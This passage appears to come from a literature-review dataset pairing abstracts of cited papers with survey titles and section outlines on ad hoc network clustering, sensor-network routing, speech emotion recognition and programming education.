clustering schemes have been proposed for ad hoc networks. A systematic classification of these clustering schemes enables one to better understand and make improvements. In mobile ad hoc networks, the movement of the network nodes may quickly change the topology resulting in the increase of the overhead message in topology maintenance. Protocols try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control protocol. The clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. A large variety of approaches for ad hoc clustering have been developed by researchers which focus on different performance metrics. This paper presents a survey of different clustering schemes. --- paper_title: A design concept for reliable mobile radio networks with frequency hopping signaling paper_content: The design of a packet radio network must reflect the operational requirements and environmental constraints to which it is subject. In this paper, we outline those features that distinguish the High Frequency (HF) Intra Task Force (ITF) Network from other packet radio networks, and we present a design concept for this network that encompasses organizational structure, waveform design, and channel access. Network survivability is achieved through the use of distributed network control and frequency hopping spread-spectrum signaling. We demonstrate how the execution of the fully distributed Linked Cluster Algorithm can enable a network to reconfigure itself when it is affected by connectivity changes such as those resulting from jamming. Additional resistance against jamming is provided by frequency hopping, which leads naturally to the use of code division mutiple access (CDMA) techniques that permit the simultaneous successful transmission by several users. Distributed algorithms that exploit CDMA properties have been developed to schedule contention-free transmissions for much of the channel access in this network. Contention-based channel access protocols can also be implemented in conjunction with the Linked Cluster network structure. The design concept presented in this paper provides a high degree of survivability and flexibility, to accommodate changing environmental conditions and user demands. --- paper_title: Adaptive Clustering for Mobile Wireless Networks paper_content: This paper describes a self-organizing, multihop, mobile radio network which relies on a code-division access scheme for multimedia support. In the proposed network architecture, nodes are organized into nonoverlapping clusters. The clusters are independently controlled, and are dynamically reconfigured as the nodes move. This network architecture has three main advantages. First, it provides spatial reuse of the bandwidth due to node clustering. Second, bandwidth can be shared or reserved in a controlled fashion in each cluster. Finally, the cluster algorithm is robust in the face of topological changes caused by node motion, node failure, and node insertion/removal. Simulation shows that this architecture provides an efficient, stable infrastructure for the integration of different types of traffic in a dynamic radio network. --- paper_title: Connectivity based k-hop clustering in wireless networks paper_content: In this paper we describe several new clustering algorithms for nodes in a mobile ad hoc network. We propose to combine two known approaches into a single clustering algorithm which considers connectivity as a primary criterion and lower ID as secondary criterion for selecting cluster heads. The goal is to minimize the number of clusters, which results in dominating sets of smaller sizes (this is important for applications in broadcasting and Bluetooth formation). We also describe algorithms for modifying cluster structure in the presence of topological changes. Next, we generalize the cluster definition so that a cluster contains all nodes that are at a distance of at most k hops from the cluster head. The efficiency of four clustering algorithms (k-lowestID and k-CONID, k=1 and k=2) is tested by measuring the average number of created clusters, the number of border nodes, and the cluster size in random unit graphs. The most interesting experimental result is stability of the ratio of the sum of CHs and border nodes in the set. It was constantly 60-70% for 1-lowestID and 46-56% for 1-ConID, for any value of n (number of nodes) and d (average node degree). Similar conclusions and similar number were obtained for k=2. We also proposed a unified framework for most existing and new clustering algorithms where a properly defined weight at each node is the only difference in the algorithm. Finally, we propose a framework for generating random unit graphs with obstacles. --- paper_title: Max-min d-cluster formation in wireless ad hoc networks paper_content: An ad hoc network may be logically represented as a set of clusters. The clusterheads form a d-hop dominating set. Each node is at most d hops from a clusterhead. Clusterheads form a virtual backbone and may be used to route packets for nodes in their cluster. Previous heuristics restricted themselves to 1-hop clusters. We show that the minimum d-hop dominating set problem is NP-complete. Then we present a heuristic to form d-clusters in a wireless ad hoc network. Nodes are assumed to have a non-deterministic mobility pattern. Clusters are formed by diffusing node identities along the wireless links. When the heuristic terminates, a node either becomes a clusterhead, or is at most d wireless hops away from its clusterhead. The value of d is a parameter of the heuristic. The heuristic can be run either at regular intervals, or whenever the network configuration changes. One of the features of the heuristic is that it tends to re-elect existing clusterheads even when the network configuration changes. This helps to reduce the communication overheads during transition from old clusterheads to new clusterheads. Also, there is a tendency to evenly distribute the mobile nodes among the clusterheads, and evently distribute the responsibility of acting as clusterheads among all nodes. Thus, the heuristic is fair and stable. Simulation experiments demonstrate that the proposed heuristic is better than the two earlier heuristics, namely the LCA and degree-based solutions. --- paper_title: 3hBAC (3-hop between adjacent clusterheads): a novel non-overlapping clustering algorithm for mobile ad hoc networks paper_content: The clustering protocol of an ad hoc network is always with interest. In this paper, we present a novel non-overlapping clustering algorithm, 3-hop between adjacent clusterheads (3hBAC), which can decrease the number of clusters without loss of connection information. In the cluster maintenance phase, we combine 3hBAC with least cluster change (LCC) algorithm to further decrease the cluster change and to extend average clusterhead time and membership time. The performances of 3hBAC are compared with highest-connectivity clustering (HCC), random competition-based clustering (RCC) in terms of average number of clusters, average clusterhead time and average membership time. 3hBAC outperforms HCC and RCC in both the cluster formation and maintenance phase. --- paper_title: MPBC: A Mobility Prediction-Based Clustering Scheme for Ad Hoc Networks paper_content: Creating a hierarchical structure by clustering has been considered an effective method to improve the performance of ad hoc networks, such as scalability and stability. This is particularly important for networks with mobile nodes, where the mobility can cause randomly and dynamically changed network topology. In this paper, we propose a mobility prediction-based clustering (MPBC) scheme for ad hoc networks with high mobility nodes, where a node may change the associated cluster head (CH) several times during the lifetime of its connection. The proposed clustering scheme includes an initial clustering stage and a cluster maintaining stage. The Doppler shifts associated with periodically exchanged Hello packets between neighboring nodes are used to estimate their relative speeds, and the estimation results are utilized as the basic information in MPBC. In the initial clustering stage, the nodes having the smallest relative mobility in their neighborhoods are selected as the CHs. In the cluster maintaining stage, mobility prediction strategies are introduced to handle the various problems caused by node movements, such as possible association losses to current CHs and CH role changes, for extending the connection lifetime and providing more stable clusters. An analytical model is developed to find the upper and lower bounds of the average connection lifetime and to find the average association change rate of MPBC. Numerical results verify the analysis and further show that the proposed clustering scheme outperforms the existing clustering schemes in ad hoc networks with high mobility nodes. --- paper_title: Clustering in mobile ad hoc networks through neighborhood stability-based mobility prediction paper_content: Clustering for mobile ad hoc networks (MANETs) offers a kind of hierarchical organization by partitioning mobile hosts into disjoint groups of hosts (clusters). However, the problem of changing topology is recurring and the main challenge in this technique is to build stable clusters despite the host mobility. In this paper, we present a novel clustering algorithm, which guarantees longer lifetime of the clustering structure in comparison to other techniques proposed in the literature. The basis of our algorithm is a scheme that accurately predicts the mobility of each mobile host based on the stability of its neighborhood (i.e., how different is its neighborhood over time). This information is then used for creating each cluster from hosts that will remain neighbors for sufficiently long time, ensuring the formation of clusters that are highly resistant to host mobility. For estimating the future host mobility, we use provably good information theoretic techniques, which allow on-line learning of a reliable probabilistic model for the existing host mobility. --- paper_title: A flexible weighted clustering algorithm based on battery power for Mobile Ad hoc Networks paper_content: Mobile Ad hoc Networks (MANET) consist of a number of wireless hosts that communicate with each other through multi-hop wireless links in the absence of fixed infrastructure. The previous research on mobile ad-hoc network suggested the use of clustering algorithm because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. In this paper, we propose that the Flexible Weighted Clustering Algorithm based on Battery Power (FWCABP), leads to a high degree of stability in the network, minimizing the number of clusters, and minimizing the overhead for the clustering formation and maintenance by keeping a node with weak battery power from being elected as a cluster-head. Simulation experiments are conducted to evaluate the performance of our algorithm in terms of the number of clusters formed, reaffiliation frequency, and number of cluster-head change. Results show that our algorithm performs better than existing ones and is also tunable to different kinds of network conditions. --- paper_title: A mobility based metric for clustering in mobile ad hoc networks paper_content: We present a novel relative mobility metric for mobile ad hoc networks (MANETs). It is based on the ratio of power levels due to successive receptions at each node from its neighbors. We propose a distributed clustering algorithm, MOBIC, based on the use of this mobility metric for selection of clusterheads, and demonstrate that it leads to more stable cluster formation than the "least clusterhead change" version of the well known Lowest-ID clustering algorithm (Chiang et al., 1997). We show reduction of as much as 33% in the rate of clusterhead changes owing to the use of the proposed technique. In a MANET that uses scalable cluster-based services, network performance metrics such as throughput and delay are tightly coupled with the frequency of cluster reorganization. Therefore, we believe that using MOBIC can result in a more stable configuration, and thus yield better performance. --- paper_title: Adaptive Power-Aware Clustering and Multicasting Protocol for Mobile Ad Hoc Networks paper_content: One of the most critical issues in wireless ad hoc networks is represented by the limited availability of energy within network nodes. Most of the researches focused on the problem of routing issues rather than energy efficiency or prolongation of network lifetime. In this paper, we proposed a multicast power greedy clustering algorithm (termed as MPGC) with the mesh scheme in the multicasting protocol of ad hoc wireless networks. The greedy heuristic clustering partitions a large-scale ad hoc network into a hierarchical cluster structure. Nodes in a cluster determine adaptively their power levels so as to be power efficient. The clusterheads acting as the agents of transmit- ters/receivers can reduce efficiently bandwidth consumption and complexity of mesh structures. Besides, the mechanism of cluster maintenance can remarkably prolong the network lifetime. The power aware multicasting protocol based on ODMRP executes suitably on the super-nodes topology formed by clusterheads. The results of the simulation show that our scheme achieves better performance for ad hoc networks, in terms of network lifetime and network scalability. --- paper_title: A Flexible Weight Based Clustering Algorithm in Mobile Ad hoc Networks paper_content: Clustering has been proven to be a promising approach for mimicking the operation of the fixed infrastructure and managing the resources in multi-hop networks. In order to achieve good performance, the formation and maintenance procedure of clusters should operate with minimum overhead, allowing mobile nodes to join and leave without perturbing the membership of the cluster and preserving current cluster structure as much as possible. In this paper, we propose a Flexible Weight Based Clustering Algorithm (FWCA) in Mobile Ad hoc Networks. The goals are yielding low number of clusters, maintaining stable clusters, minimizing the number of invocations for the algorithm and maximizing lifetime of mobile nodes in the system. Through simulations we have compared the performance of our algorithm with that of WCA in terms of the number of clusters formed, number of re-affiliations, number of states transitions on each clusterhead and number of clusterheads changes. The results demonstrate the superior performance of the proposed algorithm. --- paper_title: Topology Control Protocols to Conserve Energy in Wireless Ad Hoc Networks paper_content: In wireless ad hoc networks and sensor networks, energy use is in many cases the most important constraint since it corresponds directly to operational lifetime. This paper presents two topology control protocols that extend the lifetime of dense ad hoc networks while preserving connectivity, the ability for nodes to reach each other. Our protocols conserve energy by identifying redundant nodes and turning their radios off. Geographic Adaptive Fidelity (GAF) identifies redundant nodes by their physical location and a conservative estimate of radio range. Cluster-based Energy Conservation (CEC) directly observes radio connectivity to determine redundancy and so can be more aggressive at identifying duplication and more robust to radio fading. We evaluate these protocols through analysis, extensive simulations, and experimental results in two wireless testbeds, showing that the protocols are robust to variance in node mobility, radio propagation, node deployment density, and other factors. --- paper_title: Enhance topology control protocol(ECEC) to conserve energy based clustering in wireless ad hoc networks paper_content: The network in case of Mobile Adhoc networks is generally poorly defined or not defined at all. In Such a network the data can be relayed/routed by intermediate nodes whose position keeps on changing. Mobile adhoc networks have some challenges like Limited wireless transmission range, broadcast nature of the wireless medium, hidden terminal and exposed terminal problems, packet losses due to transmission errors-Mobility, induced route changes, Mobility-induced packet losses, Battery constraints, Ease of snooping, security problem. In wireless ad hoc networks and sensor networks, energy use is in many cases the most important constraint since it corresponds directly to operational lifetime. This paper presents new topology control protocols that extend the lifetime of dense ad hoc networks while preserving connectivity, the ability for nodes to reach each other. Our protocols conserve energy by identifying redundant nodes and turning their radios off. Cluster-based Energy Conservation (CEC) directly observes radio connectivity to determine redundancy nodes and so can be more aggressive at identifying duplication and more robust to radio fading. In CEC, if the lifetime of any gateway (LTgateway) of the cluster is less than life time of the cluster, then there will not be any connectivity in the network for LTcluster -LTgateway amount of time. Our protocol ensures that the connectivity in the network is maintained even in the case of the above stated scenario while consuming minimum energy. In this protocol(ECEC), those nodes that can hear multiple cluster-heads broadcast velocity, position, and transmission rate and life time information,then cluster-head base on Quality that introduce in session (3.2) sort gateway. after sorting, in this paper we select 2 nodes as gateways,one of them as primary gateway and the other one as reserved gateways. reserved gateway nodes wake up in time Tg, that is smaller than Ts, and notify themselves to cluster-head, if cluster-head don't answer to them, then go to sleep. --- paper_title: Performance Analysis of Clustering Protocols in Mobile Ad hoc Networks paper_content: Network clustering is an important technique widely used in efficient MANETs network management, hierarchical routing protocol design, network modeling, Quality of Service, etc. Recently many researchers are focusing on clustering which is one of the fundamental problems in mobile ad hoc networks. This article presents the descriptions of recently proposed clustering algorithms and is categorized into different approaches that support similar features. Based on the comparison of different performance metrics of different clustering algorithms, the most suitable one is recommended that adapt it to various application scenarios. This study provides adequate information for the researchers that facilitate to analyze many avenues and to offer more effective and efficient clustering protocols for MANETs. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. ---
Title: Survey of Clustering Schemes in Mobile Ad hoc Networks Section 1: Introduction Description 1: Introduce MANETs and the significance of clustering for routing, including a brief overview of hierarchical structures and challenges. Section 2: Definition Description 2: Define the process of clustering in MANETs, including roles of cluster head, gateway, and member nodes. Section 3: Algorithms for Cluster Heads Election in MANETs Description 3: Present various algorithms used for the election of cluster heads in MANETs. Section 4: Related Work Description 4: Summarize existing surveys and studies on clustering schemes in MANETs. Highlight their classifications and evaluation criteria. Section 5: Clustering Schemes in Mobile Ad hoc Network Description 5: Classify different clustering algorithms based on their objectives and cluster head election criteria, and provide detailed descriptions. Section 6: Identifier Neighbor Based Clustering Description 6: Discuss clustering schemes based on unique node IDs and their election processes. Section 7: Topology Based Clustering Description 7: Describe clustering schemes that use network topology metrics like node connectivity for cluster head selection. Section 8: Mobility Based Clustering Description 8: Explain clustering schemes based on the relative mobility of nodes and their impact on cluster stability. Section 9: Energy Based Clustering Description 9: Cover clustering algorithms focused on energy efficiency and conserving battery power of nodes. Section 10: Weight Based Clustering Description 10: Address clustering schemes that utilize a combination of weighted metrics for cluster head election. Section 11: Comparison of Clustering Schemes Description 11: Compare various clustering schemes in terms of performance metrics and effectiveness in MANETs. Section 12: Conclusions Description 12: Summarize key insights from the survey, including main characteristics, objectives, and performance of different clustering schemes.
A Survey on Routing Techniques of Data-Centric Wireless Sensor Networks
13
--- paper_title: A survey on routing protocols for wireless sensor networks paper_content: Recent advances in wireless sensor networks have led to many new protocols specifically designed for sensor networks where energy awareness is an essential consideration. Most of the attention, however, has been given to the routing protocols since they might differ depending on the application and network architecture. This paper surveys recent routing protocols for sensor networks and presents a classification for the various approaches pursued. The three main categories explored in this paper are data-centric, hierarchical and location-based. Each routing protocol is described and discussed under the appropriate category. Moreover, protocols using contemporary methodologies such as network flow and quality of service modeling are also discussed. The paper concludes with open research issues. � 2003 Elsevier B.V. All rights reserved. --- paper_title: Adaptive protocols for information dissemination in wireless sensor networks paper_content: In this paper, we present a family of adaptive protocols, called SPIN (Sensor Protocols for Information via Negotiation), that efficiently disseminates information among sensors in an energy-constrained wireless sensor network. Nodes running a SPIN communication protocol name their data using high-level data descriptors, called meta-data. They use meta-data negotiations to eliminate the transmission of redundant data throughout the network. In addition, SPIN nodes can base their communication decisions both upon application-specific knowledge of the data and upon knowledge of the resources that are available to them. This allows the sensors to efficiently distribute data given a limited energy supply. We simulate and analyze the performance of two specific SPIN protocols, comparing them to other possible approaches and a theoretically optimal protocol. We find that the SPIN protocols can deliver 60% more data for a given amount of energy than conventional approaches. We also find that, in terms of dissemination rate and energy usage, the SPlN protocols perform close to the theoretical optimum. --- paper_title: Adaptive protocols for information dissemination in wireless sensor networks paper_content: In this paper, we present a family of adaptive protocols, called SPIN (Sensor Protocols for Information via Negotiation), that efficiently disseminates information among sensors in an energy-constrained wireless sensor network. Nodes running a SPIN communication protocol name their data using high-level data descriptors, called meta-data. They use meta-data negotiations to eliminate the transmission of redundant data throughout the network. In addition, SPIN nodes can base their communication decisions both upon application-specific knowledge of the data and upon knowledge of the resources that are available to them. This allows the sensors to efficiently distribute data given a limited energy supply. We simulate and analyze the performance of two specific SPIN protocols, comparing them to other possible approaches and a theoretically optimal protocol. We find that the SPIN protocols can deliver 60% more data for a given amount of energy than conventional approaches. We also find that, in terms of dissemination rate and energy usage, the SPlN protocols perform close to the theoretical optimum. --- paper_title: Next century challenges: scalable coordination in sensor networks paper_content: Networked sensors-those that coordinate amongst themselves to achieve a larger sensing task-will revolutionize information gathering and processing both in urban environments and in inhospitable terrain. The sheer numbers of these sensors and the expected dynamics in these environments present unique challenges in the design of unattended autonomous sensor networks. These challenges lead us to hypothesize that sensor network coordination applications may need to be structured differently from traditional network applications. In particular, we believe that localized algorithms (in which simple local node behavior achieves a desired global objective) may be necessary for sensor network coordination. In this paper, we describe localized algorithms, and then discuss directed diffusion, a simple communication model for describing localized algorithms. --- paper_title: Directed diffusion: a scalable and robust communication paradigm for sensor networks paper_content: Advances in processor, memory and radio technology will enable small and cheap nodes capable of sensing, communication and computation. Networks of such nodes can coordinate to perform distributed sensing of environmental phenomena. In this paper, we explore the directed diffusion paradigm for such coordination. Directed diffusion is datacentric in that all communication is for named data. All nodes in a directed diffusion-based network are application-aware. This enables diffusion to achieve energy savings by selecting empirically good paths and by caching and processing data in-network. We explore and evaluate the use of directed diffusion for a simple remote-surveillance sensor network. --- paper_title: Improving the Energy Efficiency of Directed Diffusion Using Passive Clustering paper_content: Directed diffusion is a prominent example of data-centric routing based on application layer data and purely local interactions. In its functioning it relies heavily on network-wide flooding which is an expensive operation, specifically with respect to the scarce energy resources of nodes in wireless sensor networks (WSNs). One well-researched way to curb the flooding overhead is by clustering. Passive clustering is a recent proposal for on-demand creation and main- tenance of the clustered structure, making it very attractive for WSNs and directed diffusion in particular. The contribution of this paper is the investigation of this combination: Is it feasible to execute directed diffusion on top of a sensor network where the topology is implicitly constructed by passive clustering? A simulation-based comparison between plain directed diffusion and one based on passive clustering shows that, depending on the scenario, pas- sive clustering can significantly reduce the required energy while main- taining and even improving the delay and the delivery rate. This study also provides insights into the behavior of directed diffusion with respect to its long-term periodic behavior, contributing to a better understand- ing of this novel class of communication protocols. --- paper_title: Nodes Credit based Direct Diffusion for wireless sensor networks paper_content: Sensor Network are emerging as a new tool for important application in diverse fields like military surveillance, habitat monitoring, weather, home electrical appliances and others. Technically, sensor network nodes are limited in respect to energy supply, computational capacity and communication bandwidth. In order to prolong the lifetime of the sensor nodes, designing efficient routing protocol is very critical. In this paper, how information can effectively --- paper_title: Region Directed Diffusion in Sensor Network Using Learning Automata: RDDLA paper_content: One of the main challenges in wireless sensor network is energy problem and life cycle of nodes in networks. Several methods can be used for increasing life cycle of nodes. One of these methods is load balancing in nodes while transmitting data from source to destination. Directed diffusion algorithm is one of declared methods in wireless sensor networks which is data-oriented algorithm. Directed diffusion deals with two fundamental problems. First, in the network the data packets traverse the invalid routes up to the central node in order to make new routes and eliminate the previous ones at a very short period of time. They are dispatched from a platform lacking any central node which itself causes the decrease of data delivery rates. Second, the reconstruction of such routes urges the application of exploration phase which comes along with the distribution of interest packets and exploratory data resulting into a great deal of outputs injected into the network. But with every motion, the application of exploratory phase of central node makes an overflow of outputs. Certainly with intense movement it enjoys high importance. Having more than one sink, network is separated to some regions and the proposed algorithm called Region Directed Diffusion Learning Automata (RDDLA) updates the rout between these sinks and finds interface node with learning automata and sends packet from source to this node and transmits data to sinks with this node. This approach decreased overall network metrics up to 22%. --- paper_title: Scalable Information-Driven Sensor Querying and Routing for Ad Hoc Heterogeneous Sensor Networks paper_content: This paper describes two novel techniques, information-driven sensor querying IDSQ and constrained anisotropic diffusion routing CADR, for energy-efficient data querying and routing in ad hoc sensor networks for a range of collaborative signal processing tasks. The key idea is to introduce an information utility measure to select which sensors to query and to dynamically guide data routing. This allows us to maximize information gain while minimizing detection latency and bandwidth consumption for tasks such as localization and tracking. Our simulation results have demonstrated that the information-driven querying and routing techniques are more energy efficient, have lower detection latency, and provide anytime algorithms to mitigate risks of link/node failures. --- paper_title: The cougar approach to in-network query processing in sensor networks paper_content: The widespread distribution and availability of small-scale sensors, actuators, and embedded processors is transforming the physical world into a computing platform. One such example is a sensor network consisting of a large number of sensor nodes that combine physical sensing capabilities such as temperature, light, or seismic sensors with networking and computation capabilities. Applications range from environmental control, warehouse inventory, and health care to military environments. Existing sensor networks assume that the sensors are preprogrammed and send data to a central frontend where the data is aggregated and stored for offline querying and analysis. This approach has two major drawbacks. First, the user cannot change the behavior of the system on the fly. Second, conservation of battery power is a major design factor, but a central system cannot make use of in-network programming, which trades costly communication for cheap local computation.In this paper, we introduce the Cougar approach to tasking sensor networks through declarative queries. Given a user query, a query optimizer generates an efficient query plan for in-network query processing, which can vastly reduce resource usage and thus extend the lifetime of a sensor network. In addition, since queries are asked in a declarative language, the user is shielded from the physical characteristics of the network. We give a short overview of sensor networks, propose a natural architecture for a data management system for sensor networks, and describe open research problems in this area. ---
Title: A Survey on Routing Techniques of Data-Centric Wireless Sensor Networks Section 1: INTRODUCTION Description 1: This section introduces the basic concepts of wireless sensor networks (WSNs), including their architecture, components, and applications, and discusses the challenges and design criteria for WSNs. Section 2: ROUTING Description 2: This section defines the process of routing in WSNs, describes the characteristics that routing protocols should possess, and introduces the various protocols designed to efficiently route data within WSNs. Section 3: Characteristics for a routing protocol Description 3: This section outlines the specific characteristics that routing protocols in WSNs should have to ensure efficient and reliable data transmission, including fault tolerance, adaptability, and scalability. Section 4: Data-Centric Routing Protocols in Wireless Sensor Networks Description 4: This section provides an overview of data-centric routing protocols, explaining the concept of attribute-based naming and how these protocols operate within WSNs. Section 5: Flooding Description 5: This section describes the flooding technique used for routing in WSNs, its mechanisms, and the problems associated with it, such as implosion, overlapping, and resource blindness. Section 6: Gossiping Description 6: This section explains the gossiping protocol, a modification of the flooding technique, and discusses its mechanism and associated issues such as data redundancy. Section 7: SPIN Description 7: This section introduces the Sensor Protocols for Information via Negotiation (SPIN), detailing its approach to overcome the problems of flooding and gossiping through data negotiation. Section 8: Directed Diffusion Description 8: This section explains the directed diffusion protocol, an application-aware and data-centric approach, and discusses its phases, variants, and improvements for energy efficiency. Section 9: Rumor Routing Description 9: This section describes the Rumor Routing protocol, a variant of directed diffusion suited for cases with infrequent events, outlining its operational principles and efficiency considerations. Section 10: Gradient Based Routing Description 10: This section introduces Gradient-Based Routing, detailing its mechanism of leveraging node height to route data and the different data spreading techniques it uses. Section 11: Constrained Anisotropic Diffusion routing protocol Description 11: This section discusses the Constrained Anisotropic Diffusion routing protocol (CADR), an extension of directed diffusion, focusing on its methodologies to maximize information gain and minimize communication costs. Section 12: COUGAR Description 12: This section presents the data-centric routing protocol COUGAR, emphasizing its query plan generation, leader selection for data aggregation, and the handling of data flow in WSNs. Section 13: Conclusion Description 13: This section sums up the discussion on data-centric routing protocols in WSNs, highlighting their importance, the challenges they address, and the future direction for research.
Recognition of Emotion from Speech: A Review
8
---
Title: Recognition of Emotion from Speech: A Review Section 1: Introduction Description 1: Write an overview of emotional speech recognition, its importance, challenges, and applications. Summarize the structure of the paper. Section 2: Basic framework for emotional recognition Description 2: Describe the fundamental components and processes involved in emotional speech recognition frameworks. Section 3: Emotional speech database Description 3: Explain the criteria for evaluating emotional speech databases and the types of databases used in speech emotion recognition. Section 4: Acoustic characteristics of emotions in speech Description 4: Discuss the prosodic and acoustic features that are crucial for identifying different emotional states in speech. Section 5: Feature extraction and classification Description 5: Detail the methods for preprocessing, feature extraction, feature selection, and classification algorithms used in speech emotion recognition. Section 6: Applications Description 6: Explore the various applications of emotion detection from speech in different domains such as intelligent tutoring systems, lie detection, banking, in-car systems, and more. Section 7: Conclusion Description 7: Summarize the key points and findings of the paper. Highlight the importance of an effective database and classifier in the performance of SER systems. Discuss the future directions and potential advancements in the field. Section 8: References Description 8: Provide a list of references cited throughout the paper.
Learning and teaching programming: A review and discussion
14
--- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Zero Defect Software: Cleanroom Engineering paper_content: Publisher Summary Software is either correct or incorrect in design to a specification, in contrast with hardware that is reliable to a certain level in performing to a correct design. Certifying the correctness of such software requires two conditions—namely, statistical testing with inputs characteristic of actual usage, and no failures in the testing. Cleanroom Engineering introduces new levels of practical precision for achieving correct software, using three engineering teams—namely, specification engineers, development engineers, and certification engineers. Software can be developed and certified as correct under statistical quality control (SQC) to well-formed specifications of user requirements. The chapter discusses history and application of SQC to software development. Two major properties of Cleanroom Engineering are: no debugging by the developers before the software goes to independent testers and statistical testing taking into account both the usage and the criticalness of software parts. Cleanroom software engineering achieves statistical quality control over software development by strictly separating the design process from the testing process in a pipeline of incremental software development. There are three major engineering activities in this process are software specification, software development, and software certification. The chapter elaborates the statistical quality control in software engineering. Markov chain techniques for software certification are discussed. The cleanroom engineering methods are outlined. Box Structured Software System Design is discussed. --- paper_title: Software Metrics: An Analysis and Evaluation paper_content: Software metrics is a new area of computer science designed to enable programmers and other practitioners to assign quantitative indexes of merit to software. In this volume, "software" is defined broadly as a generic for all the stages of tailoring a computer system to solve a problem. "Software Metrics" is the first book to survey this new area, measuring its present extent, describing its characteristic features, and indicating directions of potential expansion.The aim of the articles included in the book is to provide precise, quantified answers to such questions as: What are the memory requirements of the software? The speed requirements? What is the cost of production? The likely time schedule of production? When will it have to be replaced? What manpower loading should be used? how close to its limits is the system expected to run? What levels of satisfactory testing are sufficient? How well does the testing environment approximate the execution environment? What is the enhancement cost? To what extent has the problem--of the technology--moved beyond the program? Would it cost less to rebuild the system than to maintain and enhance it?"In software, evolutionary complexity is probably more important than the classical time and space measures with which computer science has been concerned so far," the editors note in their introductory overview. This overview gauges the range of the book's fifteen contributions by the major developers of software metrics. --- paper_title: Software Engineering Economics paper_content: This paper summarizes the current state of the art and recent trends in software engineering economics. It provides an overview of economic analysis techniques and their applicability to software engineering and management. It surveys the field of software cost estimation, including the major estimation techniques available, the state of the art in algorithmic cost models, and the outstanding research issues in software cost estimation. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Expert Software Design Strategies paper_content: Early studies on programming have neglected design strategies actually implemented by expert programmers. Recent studies observing designers in real(istic) situations show these strategies to be deviating from the top-down and breadth-first prescriptive model, and leading to an opportunistically organized design activity. The main components of these strategies are presented here. Consequences are drawn from the results for the specification of design support tools, as well as for programmers' training. --- paper_title: Knowledge exploited by experts during software system design paper_content: High-level software design is characterized by incompletely specified requirements, no predetermined solution path, and by the integration of multiple domains of knowledge at various levels of abstraction. The application of data-driven knowledge rules characterizes expertise. A verbal protocol study describes these domains of knowledge and how experts exploit their rich knowledge during design. It documents how designers heavily rely on problem domain scenario simulations throughout solution development. These simulations trigger the inferences of new requirements and complete the requirement specification. Designers recognize partial solutions at various levels of abstraction in the design decomposition through the application of data-driven rules. Designers also rely heavily on simulations of their design solutions. but these are shallow, that is, limited to one level of abstraction in the solution. The findings also illustrate how designers capitalize on design methods, notations, and specialized software design schemas. Finally, the study describes how designers exploit powerful heuristics and personalized evaluation criteria to constrain the design process and select a satisfactory solution. Studies, such as this one, help map the road to understanding expertise in complex tasks. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Expert Programming Knowledge: A Strategic Approach paper_content: This chapter considers an alternative to the ‘programming plan’ view of programming expertise, namely that expert programmers have a much wider repertoire of strategies available to them as they program than do novices. This analysis does not dispute that experts have ‘plan-like’ knowledge, but questions the importance of the knowledge itself versus an understanding of when or how to use that knowledge. This chapter will firstly examine evidence which challenges the completeness of the plan-based theory and then it will look at evidence which reveals explicit strategic differences. As the studies are presented a list of strategies available to experts will be maintained. Although the emphasis of this section of the book is on expert performance, the chapter concludes with a brief look at studies of novices, since the strategic approach includes the assumption that the strategies used by novices are different from those available to experts. From all these studies it will be seen that experts choose strategies in response to factors such as unfamiliar situations, differing task characteristics and different language requirements, whilst many problems for novice programmers stem not only from lack of knowledge, but also from the lack of an adequate strategy for coping with the programming problem. ::: ::: The previous chapter has presented studies of expertise in computer programming that have concentrated on the content and structure of expert knowledge. The dominant concept has been the ‘programming plan’, which has been proposed as the experts' mental representation of programming knowledge, and which has been used in the development of programming tutors and environments for novice programmers. ::: ::: This chapter examines those aspects of expertise that are not easily explained by plan-based theories. It is intended that the strategic approach described in this chapter should be seen as a complementary, rather than alternative, explanation of expertise. As the various studies are described a list of important strategies which programmers may use will be developed. The studies that are to be presented reveal problems with two implications of the plan-based approach: ::: 1 ::: that ‘programming plans’ provide a complete explanation of expert programming behaviour; ::: ::: 2 ::: that a novice can be defined as someone who does not possess this expert knowledge. ::: ::: ::: ::: ::: An important, but often implicit assumption of the plan-based theorists is that the cognitive processes underlying programming are relatively straightforward. Often based on ideas from artificial intelligence, these processes are taken to be general problem-solving skills (cf. 